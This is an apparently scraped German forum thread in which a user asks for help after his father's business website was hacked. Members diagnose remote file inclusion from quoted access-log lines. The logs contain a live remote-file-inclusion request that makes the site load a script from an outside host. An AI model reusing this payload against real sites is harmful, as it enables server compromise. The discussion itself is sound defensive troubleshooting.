PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren
# ISBN-10: 3898644502
# ISBN-13: 978-3898644501
Gibt einen recht guten Überblick
Der Rest wurde imo schon gesagt/gefragt
URL: https://www.overclockers.at/applications/website_gehackt_server_spezis_gefragt_186564/page_1 - zur Vollversion wechseln!
hallo liebe oc-community!
hab folgendes problem schon im g.at-forum gepostet, aber du wurde mir nicht so recht geholfen und der tipp gegeben es einmal hier zu versuchen.
die webseite meines vaters war jetzt für ein paar tage nicht erreichbar. auf anfrage beim host bekam er die melung zurück, die website sei gehackt worden plus text-schnippsel aus einem log-file.
weiters meinte man, sollte diese sicherheitslücke von meinem vater nicht behoben werden, werde die seite wieder gesperrt.
hier das log:
quote: /home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:19 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:32 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:189-19-21-18.dsl.telesp.net.br - -
[08/Sep/2007:12:51:24 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.0" 302 0 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
meine frage ist jetzt:
ich weiß jetzt nicht 100% wie das bei meinem vater abläuft, aber er ist definitiv kein webadmin, er lädt die sachen nur rauf. wie soll also er eine sicherheitslücke schließen, die eigentlich der host und eigentliche serveradmin beheben sollte?
bzw. kann wer aus dem log-ausschnitt wirklich erkennen um was für einen "hack" es sich handelt?
Ok was für ne Seite ist das eigentlich von deinem Vater?
Verwendet er irgendwelche Datenbanken? Ists ein Forum? Ein Blog? Welche Software läuft drauf?
Das einzige, was ich mir aufgrund der wirklich spaerlichen Information vorstellen koennte ist, dass eure Webapplikation ueber den GET-Parameter "id" remote file inclusion zulaesst. Ein wget-Useragent allein (auch von einem uralt-Red-Hat) ist jedenfalls noch nicht Verdachtsmoment genug...
Welche Webapplikation laeuft denn auf eurem Webspace?
URL? /e. Rest wurde schon gesagt..
pf. ihr überhäufts mich mit fragen. ;p
ich hab ehrlich gesagt keine ahnung. ist die website zum geschäft meines vaters und ich hatte mit derer administration noch nichts am hut. dass über die url code ausgeführt/oder, zweiter gedanke, der server einfach nur zugemüllt wird, war auch mein erster gedanke. aber da ich nicht regelmäßig mit httpds arbeite fehlt mir da einfach die erfahrung.
es kommt mir aber immer mehr der verdacht, dass für die behebung dieses fehlers nicht mein vater sondern der wirkliche host selbst verantwortlich ist...
denke auch es wird das von colossus beschriebene problem sein. die laden über den parameter ID eine externe webseite rein die sonst was macht. direkte includes in php sind böse..
Hmm es kann sein dass eine alte PHP Version auf diesem Host installiert ist... Oder wie Colossus schon geschrieben hat eine File inclusion bei einer Abfrage möglich ist ... Selbst geschriebene Software?
Ohne mehr Informationen wirst keine detailiertere Antwort bekommen. Tut mir leid.
Ist die Webseitenadresse geheim? Ansonsten poste sie mal, vielleicht können wir dir dann mehr sagen...
Lg,
Robert
Falls du Literatur benötigst um etwaige Sicherheitslücken -in der PHP application- zu stopfen :
PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren
# ISBN-10: 3898644502
# ISBN-13: 978-3898644501
Gibt einen recht guten Überblick
Der Rest wurde imo schon gesagt/gefragt
website ist diabolo.at
welche version von etomite ist denn drauf?
zB
http://secunia.com/advisories/18556/
wenn man im google nach
"GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt?"
sucht, findet man zahlreiche einträge. dürfte ein recht beliebter exploit von anfälliger PHP software sein (php securemode=off?)
[OT]
Zitat von k3nny_gatwebsite ist diabolo.at
wtf smilies auf der rechnung?! 
overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2025